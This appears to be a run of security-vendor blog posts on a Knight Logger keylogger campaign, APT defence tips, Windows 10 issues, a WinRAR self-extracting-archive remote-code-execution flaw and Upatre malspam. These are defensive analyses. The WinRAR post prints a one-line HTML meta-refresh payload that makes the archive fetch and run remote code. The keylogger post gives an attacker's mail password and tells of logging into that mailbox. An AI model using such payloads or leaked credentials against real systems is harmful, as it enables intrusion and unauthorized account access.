I ran across an interesting piece of keylogging malware that uses a pre-built keylogger named Knight Logger. This particular keylogger is openly available for purchase online by its author. Of course it’s labeled for educational purposes only and says you must have the computer owner’s permission to install the keylogger. It also boasts its AV detection rate with 0/39 AV engine detections, the ability to recover passwords, and provide “screenshoots” of the computer.


The original message was a 903kb rar file with the exe inside claiming to be from HSBC. This is a rather large file size for malware given our average size is probably closer to 60k for most malware. When uncompressed it comes in at around 1.2Mb. Upon execution, the malware gets it’s external IP address from 4 different external websites. These websites are pretty popular with malware since they can make a simple external HTTP request and get their external IP back in plain text. This process is repeated it looks like every time the malware sends out data, most likely to make sure the IP stays up to date for anyone roaming.

Screenshot - 10072015 - 10:14:41 AM


For actually sending out data, the malware sent a plain text email every couple of minutes. This email contained a plain text file of keylogging and a full jpg screenshot of what was on the screen at the time.


So this is where things get sort of interesting and lazy on the attackers part. During the exfiltration of your data, it logs in to the remote SMTP server. It logs in using base64 encoded username and password. The password I do feel like sharing because it was pretty bad. You can see the bad guys email is info@<redacted>. His password was info1234. At least there’s a login I guess, only slightly better than an open relay. And once logged in as I mentioned, it then proceeds to send the data in plain text (base64 encoded attachments). I wanted to see if the mail server was still up and running a little bit after I had run the malware. A lot of the time within an hour or so, we see server taken down when they are involved in these types of schemes. So I grabbed the login info and converted it and tried to connect to the server. The server was indeed still up and the authentication was a success.

So I noticed on the SMTP transaction, the login address, FROM, and TO were all the same email address. On a hunch, I fired up Thunderbitrd and dropped in the username and password expecting nothing really. But oh no, not this time. The credentials they are using to log in to the mail server also work for a POP connection to the actual destination mailbox the malware sends to. Thunderbird proceeded to download the messages from victim computers with the keylogged data and screenshots (or as Knight Logger says “screenshoots”). This was something I didn’t expect to actually work and makes me think this whole thing was thrown together by someone with not too much thought put in to it. They grabbed an available keylogger online and created a wrapper around it to just hopefully get it running on the victims computer.

screenshotofthunderbird fullmessagelogger

Data is king when it comes to the dark belly of the internet these days. With a successful attack like this using a keylogger, who knows how long these users personal information would be exposed. Having up to data AV software and network protection can help prevent these types of attacks playing out. Or in the case of software built to evade AV, it can only evade for so long. Having the tools and pieces in place to monitor computers and traffic can help detect what might have otherwise gone unnoticed.

By Rocco Donnino, AppRiver

Once primarily used for espionage on governments and militaries, advanced persistent threats (APTs) are growing and targeting a new variety of organizations. Many companies are bolstering their online security, as evidenced by the $985 million organizations spent on advanced threat detection in 2014, according to recent research from Gartner*.


AppRiver offers three tips to help keep your organization safe from APTs:

  1. Cloud-based security solutions with real-time threat updates can help ensure that your organization is protected from the most recent threats. If your security software is only updated once per hour, then your network is vulnerable to the most recent APT attempts during that time. And given the message that a name like “advanced persistent threat” carries, waiting for a security update or patch is not ideal.  AppRiver’s SecureSurf™ Web Protection, for example, is updated thousands of times daily and based on malware trends from millions of sources.
  2. While email spam and virus protection will block most malicious emails, the savviest APTs out there will deliver a payload that is not executable via email. Instead, they will have a link to a malicious website. This is where adopting a layered security approach comes into play. For example, AppRiver’s email spam and virus filtering solution, SecureTide™, blocks more than 99 percent of malicious emails. However, if an email with a rogue URL were to sneak past us, then AppRiver’s SecureSurf would use intelligent DNS to block the malicious website. However, if it were a malicious link on a reputable site, like a malvertisement on Yahoo, SecureSurf using an adaptive proxy (which is also recommended by Gartner) would then block only the malicious advertisement while allowing the user to safely browse Yahoo.
  3. Most ATPs have the aim of running quietly in the background while sending out information on your network over time, which is what makes advanced threat notifications so imperative for triaging a successful ATP attempt. When looking for the advanced threat notification that’s right for your organization, look for a solution that will alert you if a malicious program is attempting to send out information from within your network. This warning can save your business from public reputation damage and costly penalties if any personal information was compromised. It should also provide immediate notification of advanced persistent threat activity so that network administrators can locate and quickly remediate affected endpoints.

* Pingree, L., MacDonald, Neil., Firstrbook, P. (4 May 2015).  Best Practices for Detecting and Mitigating Advanced Persistent Threats, Gartner Research.

By Michael Imlay

Windows 10 is a step toward personal computing; and to a world that is more mobile.  As customers and partners embark on the Windows 10 journey, we thought it might be useful to list some of the issues we’re hearing about and discuss viable workarounds.


  • Forced Automatic Updates for Windows 10 Home Edition

Windows 10 Home Edition has automatic updates that cannot be disabled, while Windows 10 Professional Edition allows you to defer updates up to a few months, after which they will be installed automatically.

You can only uninstall/disable updates/upgrades after they have been installed and you cannot chose to simply pass an update, even on apps from the Windows Store. This has both good and bad implications. The good implications are that from a security standpoint, your system will always be up to date with the latest security updates and patches. However, in some cases, updates can break systems and cause issues, and you’ll be the guinea pig. For example, Windows 10 pushed an update for nVidia Drivers which caused many systems to become unbootable and leaving many users having to reinstall Window. There was also a security update that was pushed out which caused many users to get stuck into a “boot loop” and unable to boot into Windows. However, even with the minor downfalls to forced updates, overall for all users this is going to make your system much more secure as all security patches will be pushed to your system allowing Microsoft to quickly roll out fixes and preventing your system from becoming compromised. In the past, many users did not install updates on previous versions of Windows which put their system, and others, at risk. This changes all that.

You can setup Windows Update to prompt you to restart instead of restarting automatically as well as enabling defer upgrades. You can do this by going to Start/Settings/Update and Security/Windows Update/Advanced Options.

Imlay's Blog Post

  • Cortana Comes with Strings

Under the default “Express” settings, Windows 10 is configured to send various information to Microsoft and other parties, including the collection of user contacts, calendar data, and “associated input data” to personalize “speech, typing, and inking input,” typing and inking data to improve recognition, allowing apps to use a unique “advertising ID” for analytics and advertising personalization (functionality introduced by Windows 8.1) and allow apps to request the user’s location data and send this data to Microsoft and “trusted partners” to improve location detection (Windows 8 had similar settings, except that location data collection did not include “trusted partners”).

Users can opt out from most of this data collection, but telemetry data for error reporting and usage is also sent to Microsoft, and this cannot be disabled on non-enterprise versions of Windows 10. The use of Cortana also requires the collection of data “such as your device location, data from your calendar, the apps you use, data from your emails and text messages, who you call, your contacts and how often you interact with them on your device” to personalize its functionality. Microsoft Services Agreement reads that the company’s online services may automatically “download software updates or configuration changes, including those that prevent you from accessing the Services, playing counterfeit games, or using unauthorized hardware peripheral devices.”

Critics interpreted this statement as implying that Microsoft would scan for and delete pirated software installed on devices running Windows 10. Additionally, Windows 10 has a feature, enabled by default, to share WiFi passwords to your contacts. This means that if you connect to your personal WiFi network at home, your WiFi password is shared with all your contacts so if they visit your home, their Windows 10 system will automatically connect to your network, without ever providing them the WiFi password. This could pose a security risk.

However, do not fear! Thankfully, Microsoft has provided a dedicated privacy section under settings which allows a user to disable most of these settings. You can access these settings by going to start/settings/privacy. Additionally, you can also disable WiFi Sense (so that your networks/passwords aren’t shared with your contacts) by going to Settings > Network & Internet > Wi-Fi > Manage Wi-Fi settings. In here, you basically want to disable every option you see, as well as tell Windows 10 to forget any Wi-Fi networks you’ve signed into in the past.

Photo 2

Photo 3

Photo 4

  • Windows 10 Driver Model

Windows 10 introduces the new WDDM 2.0 driver model including DirectX 12 (which is a Windows 10 exclusive for gamers) This is overall a better driver model and as long as your hardware is supported in Windows 10, there shouldn’t be any issues upgrading. However, many devices are unsupported, or have issues under Windows 10 with the new driver model. As an example, I attempted to upgrade my work laptop (Dell Latitude) to Windows 10. However, there is an issue with the video drivers under Windows 10 that prevents me from using my 3rd monitor. I spent countless hours trying to get the 3rd monitor to work, but ended up having to revert back to Windows 8.1. At home, my HP Photosmart D110 was unstable under Windows, printer would work, but scanner function wouldn’t work. Additionally, my GeForce GTX 980 Ti Video Card (new $700 video card) was initially listed as unsupported with Windows 10 upon release (although this has now been fixed). So, a key point here is to make sure your hardware is fully supported and to always have a fall back option in case something isn’t supported that isn’t known yet.

  • New Start Menu Limitations

If you are a power user and have a lot of applications installed, it may break the new start menu. If you have over 500 items in your start menu, it will break it.

  • Distributed Update System

As Windows 10 automatically downloads updates to your system, Windows 10 is sharing those updates with other computers on your network and on the internet. This poses a security concern as this works much like a torrent system does and other users computers are downloading updates directly from your system. As your system is sharing these updates, it may slow your internet connection down and many ISP’s, such as AT&T, Mediacom, and Cox have bandwidth limits in place which this feature is causing many users to face overage charges on metered connections.

However, you can disable, or change the update system by going to Start/Settings/Update and Security/Windows Update/Advanced Options/Choose how updates are delivered. From here, you can disable the Distributed Update System completely, or only enable it for devices on your own network.

Photo 5

  • Windows 7/8.1 users are being “forced” to upgrade to Windows 10.

If you have automatic updates enabled, Microsoft is downloading Windows 10 to your computer, even if you didn’t opt in for the Windows 10 upgrade. This is causing many people to see a loss of free disk space (3.5 GB to 6 GB) because of this download, as well as facing overage charges of metered connections.

Researchers at Vulnerability-Lab have discovered an issue in WinRAR software that allows for remote code execution for self extracting exe files. Self Extracting Archives (SFX files) are executable files that contains the necessary code to extract a file without needing an extractor pre-installed. So you could send someone one of these self extracting files without needing to worry if they have something like WinRAR or 7zip installed already. This can be convenient when dealing with external clients in which you may not know what software they have.

OO7XQL3Q9C (1)


This issue that was discovered has to do with the display text section of the SFX file when opened. The text section supports HTML and can remotely retrieve that HTML info needed. In the proof of concept provided by Vulnerability-Lab, that HTML could point to a server containing malicious executables and WinRAR will download and execute the remote file.


Simple HTML like this in the text window could point to the server containing malicious code to be executed:

<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=″</head></html>

Something I noticed that did work with these was to use the WinRAR option of right clicking to extract the file. This prevents opening the display window where the malicious HTML may be lurking and simply extracts the original file. But that of course doesn’t mean the extracted file is safe.




Since the HTML is interpreted as soon as the SFX file is opened, that means there’s no other user interaction required for the vulnerability to be exploited. The original file that was archived doesn’t even need to be extracted. Simply opening the file is enough. I was able to recreate this pretty simply so this could be something we will see in the future in malware campaigns. Since the SFX file still contains an exe extension, hopefully most users will already be cautious of unknown exe’s enough to know not to open it. This is certainly a prime example of why unknown attachments should be avoided.

This morning we’ve been seeing yet another offering from the Upatre guys. This time it comes in with a rather lengthy, by comparison, email with the subject line “Attorney-client agreement”. This story line certainly leaves out a few major details as it begins with a lawyer apparently already in court fighting against some sort of breach of contract suit against the recipient. The opening paragraph even forgives the intended targets for missing court this morning, citing that the court “understood”. This must come as a real shock to those of us who don’t keep a lawyer on retainer and those who didn’t realize they were being sued. It probably would’ve been really nice of this mystery lawyer to let you know that this was going on before it got to this point, I would think.


Regardless, the email goes on to give a vague report on what happened in court this day and a few things that the new defendant can expect as this fake lawsuit unfolds. This is a very classic, although slightly long-winded, social engineering technique employed by cyber thieves to both raise a little fear and a lot of curiosity in their victims which will then hopefully entice them into falling for their ruse. The payload in this attack lives in an accompanying attachment. Each of these attachments are quasi randomly named by stringing together three different words from an apparent wordlist supplied by the command and control server. This randomization makes it slightly harder to nail down these files, simply because one cannot block based on the filename alone. Otherwise, it’s business as usual when it comes to stopping these nuisances.


One interesting detail about this line of attacks is that they seem to be targeting older, out of date PCs. After running the samples on a couple different operating systems, they only seemed to want to carry out their malicious intent on machines running Windows XP (I was using SP3). On newer versions it would shut itself down almost immediately after execution. Once operational though, this malware begins to hijack system processes to get a foothold on its new victim. It then reaches out to check its IP address and then looks to communicate with the IP on port 12299 where it reports back with information about the new target such as the IP it had just looked up and the computer name. Following this, the malware adds a good number of registry entries dealing with security certificates, mostly disallowing them and peeks around for debugging tools.

Even on Windows XP these samples seemed a little rickety as they tended to crash after a fairly short period of time, but they did have the best success rate on the XP machines. I wouldn’t be surprised though if this little issue is quickly resolved and we start seeing the next campaign from these guys within the day. Seeing several different themes from this particular family of malware has been commonplace and happening on a daily basis for quite sometime now.

AppRiver’s SecureTide has everyone covered though as we’re blocking these preemptively to help keep your machines happy and healthy.